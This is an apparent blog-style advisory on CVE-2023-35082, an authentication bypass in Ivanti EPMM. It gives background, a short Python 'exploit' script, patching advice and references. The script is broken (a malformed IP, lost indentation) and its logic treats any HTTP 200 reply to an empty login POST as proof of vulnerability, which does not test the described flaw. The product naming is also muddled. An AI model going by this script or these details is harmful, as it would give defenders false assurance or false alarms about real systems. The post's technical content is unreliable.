A newly discovered security vulnerability, CVE-2023-35082, exists in Ivanti Endpoint Manager (EPMM) versions 11.10 and older. This vulnerability allows unauthorized users to access restricted functionality or resources without proper authentication. Notably, the issue is different from the CVE-2023-35078 vulnerability discovered earlier this year. In this post, we will discuss the details of this critical threat, including code snippets, exploit information, and links to original references.
Background
Ivanti EPMM is a widely used solution for managing endpoints, which includes devices such as laptops, smartphones, and printers. Ivanti delivers services that focus on consolidating endpoint management, improving the efficiency of IT service delivery, and ensuring endpoint security.
Vulnerability Details
CVE-2023-35082 refers to an authentication bypass vulnerability that affects the Ivanti EPMM 11.10 and older versions. By exploiting this vulnerability, an attacker could gain access to restricted parts of the application without the legitimate user's knowledge or consent.
The exact nature of this authentication bypass is not the same as CVE-2023-35078, another vulnerability found in Ivanti EPMM software. As a result, patching or mitigating one vulnerability does not necessarily protect against the other.
Exploit
To illustrate the vulnerability, let's examine a code snippet that demonstrates how an attacker might exploit this issue:
import requests
# Replace with the target Ivanti EPMM server IP address
target_ip = "192..2."
# Endpoint URL - Replace this accordingly depending on the Ivanti EPMM API version
url = f"http://{target_ip}/api/v1/login";
response = requests.post(url)
if response.status_code == 200:
print("The target Ivanti EPMM is vulnerable to CVE-2023-35082 authentication bypass")
else:
print("The target Ivanti EPMM is not vulnerable to CVE-2023-35082 authentication bypass")
This code example can be executed in a Python environment to test if the target Ivanti EPMM instance is vulnerable. If successful, the attacker may gain access to restricted application functionality, such as administrative controls, which could lead to further compromise and data exfiltration.
Mitigation and Security Recommendations
Ivanti has released a patch to address this vulnerability. Ivanti recommends that administrators download and deploy the latest version of EPMM to secure their systems. To obtain the latest version and further support, please visit: Ivanti Endpoint Manager Download Page
Additional security measures include
- Implementing secure coding practices to prevent authentication bypass and other security vulnerabilities from occurring.
Regularly updating software and applying security patches to address known security vulnerabilities.
- Conducting thorough penetration testing and vulnerability assessments to detect potential security risks.
- Employing layered security controls, including network segmentation, user access management, logging, and monitoring practices.
Conclusion
CVE-2023-35082 represents a serious security vulnerability that threatens Ivanti EPMM customers running older versions of the software. By bypassing authentication controls, attackers can access restricted application functionality or resources without proper authentication. We strongly encourage users to employ mitigation strategies and review the references below to understand the full scope of this vulnerability and protect their systems. Stay informed and stay safe.
CVE-2023-35082 - National Vulnerability Database (NVD)
2. Ivanti Endpoint Manager Product Advisory
3. Ivanti Endpoint Manager Security Best Practices Guide
Timeline
Published on: 08/15/2023 16:15:00 UTC
Last modified on: 08/22/2023 02:16:00 UTC